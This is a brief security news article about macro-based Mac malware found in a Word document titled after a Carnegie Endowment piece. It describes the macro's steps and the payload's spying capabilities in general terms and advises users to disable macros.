Taking advantage of a primitive Windows technique relying on automatically-running macros embedded in Microsoft Word documents, a new type of Mac malware attack has been discovered recently. As first noted in a research compiled by Objective-See, the technique used may be crude but once an unsuspecting user opens an infected Word document and chooses to run the macros, the malware installs itself silently on the target Mac and immediately attempts to download a hazardous payload.
The attack was first discovered in a Word file titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.”
After opening an infected document in Word for Mac and clicking Enable Macros in the dialog, the embedded macro does the following things:
- Checks to make sure the LittleSnitch security firewall isn’t running.
- Downloads an encrypted second-stage payload.
- Decrypts the payload using a hard-coded key.
- Executes the payload.
Once installed, the payload could potentially log your keystrokes, monitor the camera and the system clipboard, take screenshots, access iMessage, retrieve your browsing history and more. It also automatically executes itself after a reboot.
Thankfully, the remote payload file has since been removed from the server.
Although dangerous, this isn’t a particularly advanced form of attack.
You can protect yourself from these kinds of attacks by ensuring that you click Disable Macros when opening a suspicious Word document. Given the prevalence of macros-based malware on Windows, small wonder Microsoft included a clear warning about viruses in Word’s dialog.